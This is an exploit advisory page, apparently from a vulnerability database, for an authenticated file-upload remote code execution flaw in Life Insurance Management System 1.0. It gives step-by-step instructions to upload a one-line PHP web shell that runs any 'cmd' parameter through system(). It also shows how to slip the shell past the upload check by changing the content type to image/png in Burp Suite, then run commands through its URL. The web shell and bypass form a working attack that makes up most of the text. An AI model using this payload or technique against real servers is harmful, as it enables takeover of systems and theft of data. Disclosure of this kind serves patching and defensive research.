Life Insurance Management System 1.0 Shell Upload

2021.01.18

Credit: Aitor Herrero

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-264

# Exploit Title: Life Insurance Management System 1.0 - File Upload RCE (Authenticated)
# Date: 15/1/2021
# Exploit Author: Aitor Herrero
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
# Version: 1.0
# Tested on: Windows /linux /
Login in the application
Go to Clients and you can add new client o modify existent
Click examination botton and upload a test.php with content:
"<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd =
($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>"
Click Upload and intercept with burpsuite
Change the content type to image/png
Go to the path
http://localhost:8080/lims/uploads/test.php?cmd=dir

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Life Insurance Management System 1.0 Shell Upload

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.